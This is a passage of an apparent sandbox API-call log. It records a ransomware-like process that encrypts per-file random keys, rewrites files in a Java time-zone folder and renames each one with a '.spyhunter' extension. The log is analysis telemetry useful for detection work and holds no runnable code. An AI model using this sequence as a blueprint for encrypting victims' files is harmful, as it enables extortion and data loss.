hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6f0 | out: pbBuffer=0x57e6f0) returned 1 [0167.525] GetProcessHeap () returned 0x2c0000 [0167.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.525] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6e8*=0x30) returned 1 [0167.525] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pohnpei" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pohnpei"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.526] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pohnpei") returned 59 [0167.526] StrStrW (lpFirst="Pohnpei", lpSrch=".txt") returned 0x0 [0167.526] GetProcessHeap () returned 0x2c0000 [0167.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.526] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e6ac*=0x41, lpOverlapped=0x0) returned 1 [0167.527] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.527] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x57e6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e6ac*=0x41, lpOverlapped=0x0) returned 1 [0167.527] GetProcessHeap () returned 0x2c0000 [0167.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.527] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.527] WriteFile (in: hFile=0xa0, lpBuffer=0x57e6ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6ac, lpOverlapped=0x0 | out: lpBuffer=0x57e6ec*, lpNumberOfBytesWritten=0x57e6ac*=0x4, lpOverlapped=0x0) returned 1 [0167.527] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6ac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6ac*=0x30, lpOverlapped=0x0) returned 1 [0167.528] CloseHandle (hObject=0xa0) returned 1 [0167.528] GetProcessHeap () returned 0x2c0000 [0167.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.528] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pohnpei.spyhunter") returned 69 [0167.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pohnpei" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pohnpei"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pohnpei.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pohnpei.spyhunter")) returned 1 [0167.529] GetProcessHeap () returned 0x2c0000 [0167.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.529] GetProcessHeap () returned 0x2c0000 [0167.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.529] GetProcessHeap () returned 0x2c0000 [0167.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4000 | out: hHeap=0x2c0000) returned 1 [0167.529] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6f0 | out: pbBuffer=0x57e6f0) returned 1 [0167.529] GetProcessHeap () returned 0x2c0000 [0167.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.530] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6e8*=0x30) returned 1 [0167.530] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pitcairn" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pitcairn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.531] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pitcairn") returned 60 [0167.531] StrStrW (lpFirst="Pitcairn", lpSrch=".txt") returned 0x0 [0167.531] GetProcessHeap () returned 0x2c0000 [0167.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.532] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e6ac*=0x4d, lpOverlapped=0x0) returned 1 [0167.533] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.533] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x57e6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e6ac*=0x4d, lpOverlapped=0x0) returned 1 [0167.533] GetProcessHeap () returned 0x2c0000 [0167.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.533] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.533] WriteFile (in: hFile=0xa0, lpBuffer=0x57e6ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6ac, lpOverlapped=0x0 | out: lpBuffer=0x57e6ec*, lpNumberOfBytesWritten=0x57e6ac*=0x4, lpOverlapped=0x0) returned 1 [0167.533] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6ac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6ac*=0x30, lpOverlapped=0x0) returned 1 [0167.533] CloseHandle (hObject=0xa0) returned 1 [0167.533] GetProcessHeap () returned 0x2c0000 [0167.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.533] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pitcairn.spyhunter") returned 70 [0167.534] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pitcairn" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pitcairn"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pitcairn.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pitcairn.spyhunter")) returned 1 [0167.535] GetProcessHeap () returned 0x2c0000 [0167.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.535] GetProcessHeap () returned 0x2c0000 [0167.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.535] GetProcessHeap () returned 0x2c0000 [0167.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4d90 | out: hHeap=0x2c0000) returned 1 [0167.535] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6e8 | out: pbBuffer=0x57e6e8) returned 1 [0167.535] GetProcessHeap () returned 0x2c0000 [0167.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.535] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6e0*=0x30) returned 1 [0167.535] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Palau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\palau"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.536] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Palau") returned 57 [0167.536] StrStrW (lpFirst="Palau", lpSrch=".txt") returned 0x0 [0167.536] GetProcessHeap () returned 0x2c0000 [0167.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.536] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e6a4*=0x41, lpOverlapped=0x0) returned 1 [0167.537] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.537] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x57e6a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e6a4*=0x41, lpOverlapped=0x0) returned 1 [0167.538] GetProcessHeap () returned 0x2c0000 [0167.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.538] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.538] WriteFile (in: hFile=0xa0, lpBuffer=0x57e6e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6a4, lpOverlapped=0x0 | out: lpBuffer=0x57e6e4*, lpNumberOfBytesWritten=0x57e6a4*=0x4, lpOverlapped=0x0) returned 1 [0167.538] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6a4*=0x30, lpOverlapped=0x0) returned 1 [0167.538] CloseHandle (hObject=0xa0) returned 1 [0167.538] GetProcessHeap () returned 0x2c0000 [0167.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.538] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Palau.spyhunter") returned 67 [0167.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Palau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\palau"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Palau.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\palau.spyhunter")) returned 1 [0167.540] GetProcessHeap () returned 0x2c0000 [0167.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.540] GetProcessHeap () returned 0x2c0000 [0167.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.540] GetProcessHeap () returned 0x2c0000 [0167.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3f40 | out: hHeap=0x2c0000) returned 1 [0167.540] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6e8 | out: pbBuffer=0x57e6e8) returned 1 [0167.540] GetProcessHeap () returned 0x2c0000 [0167.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.540] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6e0*=0x30) returned 1 [0167.540] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pago_Pago" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pago_pago"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.541] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pago_Pago") returned 61 [0167.541] StrStrW (lpFirst="Pago_Pago", lpSrch=".txt") returned 0x0 [0167.542] GetProcessHeap () returned 0x2c0000 [0167.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.542] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e6a4*=0x4d, lpOverlapped=0x0) returned 1 [0167.543] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.543] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x57e6a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e6a4*=0x4d, lpOverlapped=0x0) returned 1 [0167.543] GetProcessHeap () returned 0x2c0000 [0167.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.543] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.543] WriteFile (in: hFile=0xa0, lpBuffer=0x57e6e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6a4, lpOverlapped=0x0 | out: lpBuffer=0x57e6e4*, lpNumberOfBytesWritten=0x57e6a4*=0x4, lpOverlapped=0x0) returned 1 [0167.543] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6a4*=0x30, lpOverlapped=0x0) returned 1 [0167.543] CloseHandle (hObject=0xa0) returned 1 [0167.543] GetProcessHeap () returned 0x2c0000 [0167.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.544] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pago_Pago.spyhunter") returned 71 [0167.544] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pago_Pago" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pago_pago"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pago_Pago.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pago_pago.spyhunter")) returned 1 [0167.545] GetProcessHeap () returned 0x2c0000 [0167.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.545] GetProcessHeap () returned 0x2c0000 [0167.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.545] GetProcessHeap () returned 0x2c0000 [0167.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4cc8 | out: hHeap=0x2c0000) returned 1 [0167.545] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6e0 | out: pbBuffer=0x57e6e0) returned 1 [0167.545] GetProcessHeap () returned 0x2c0000 [0167.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.545] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6d8*=0x30) returned 1 [0167.546] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Noumea" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\noumea"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.547] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Noumea") returned 58 [0167.547] StrStrW (lpFirst="Noumea", lpSrch=".txt") returned 0x0 [0167.547] GetProcessHeap () returned 0x2c0000 [0167.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.548] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e69c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e69c*=0x79, lpOverlapped=0x0) returned 1 [0167.549] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff87, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.549] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x79, lpNumberOfBytesWritten=0x57e69c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e69c*=0x79, lpOverlapped=0x0) returned 1 [0167.549] GetProcessHeap () returned 0x2c0000 [0167.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.549] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.549] WriteFile (in: hFile=0xa0, lpBuffer=0x57e6dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e69c, lpOverlapped=0x0 | out: lpBuffer=0x57e6dc*, lpNumberOfBytesWritten=0x57e69c*=0x4, lpOverlapped=0x0) returned 1 [0167.549] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e69c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e69c*=0x30, lpOverlapped=0x0) returned 1 [0167.549] CloseHandle (hObject=0xa0) returned 1 [0167.550] GetProcessHeap () returned 0x2c0000 [0167.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.550] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Noumea.spyhunter") returned 68 [0167.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Noumea" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\noumea"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Noumea.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\noumea.spyhunter")) returned 1 [0167.782] GetProcessHeap () returned 0x2c0000 [0167.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.782] GetProcessHeap () returned 0x2c0000 [0167.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.782] GetProcessHeap () returned 0x2c0000 [0167.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3e80 | out: hHeap=0x2c0000) returned 1 [0167.783] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6e0 | out: pbBuffer=0x57e6e0) returned 1 [0167.783] GetProcessHeap () returned 0x2c0000 [0167.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.783] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6d8*=0x30) returned 1 [0167.783] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Funafuti" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\funafuti"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.784] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Funafuti") returned 60 [0167.784] StrStrW (lpFirst="Funafuti", lpSrch=".txt") returned 0x0 [0167.784] GetProcessHeap () returned 0x2c0000 [0167.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.784] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e69c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e69c*=0x41, lpOverlapped=0x0) returned 1 [0167.784] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.784] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x57e69c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e69c*=0x41, lpOverlapped=0x0) returned 1 [0167.785] GetProcessHeap () returned 0x2c0000 [0167.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.785] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.785] WriteFile (in: hFile=0xa0, lpBuffer=0x57e6dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e69c, lpOverlapped=0x0 | out: lpBuffer=0x57e6dc*, lpNumberOfBytesWritten=0x57e69c*=0x4, lpOverlapped=0x0) returned 1 [0167.785] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e69c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e69c*=0x30, lpOverlapped=0x0) returned 1 [0167.785] CloseHandle (hObject=0xa0) returned 1 [0167.785] GetProcessHeap () returned 0x2c0000 [0167.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.785] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Funafuti.spyhunter") returned 70 [0167.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Funafuti" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\funafuti"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Funafuti.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\funafuti.spyhunter")) returned 1 [0167.786] GetProcessHeap () returned 0x2c0000 [0167.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.786] GetProcessHeap () returned 0x2c0000 [0167.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.786] GetProcessHeap () returned 0x2c0000 [0167.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4688 | out: hHeap=0x2c0000) returned 1 [0167.786] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6d8 | out: pbBuffer=0x57e6d8) returned 1 [0167.786] GetProcessHeap () returned 0x2c0000 [0167.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.786] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6d0*=0x30) returned 1 [0167.786] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fiji" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fiji"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.787] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fiji") returned 56 [0167.787] StrStrW (lpFirst="Fiji", lpSrch=".txt") returned 0x0 [0167.787] GetProcessHeap () returned 0x2c0000 [0167.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.787] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e694, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e694*=0x24c, lpOverlapped=0x0) returned 1 [0167.788] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffdb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.788] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, 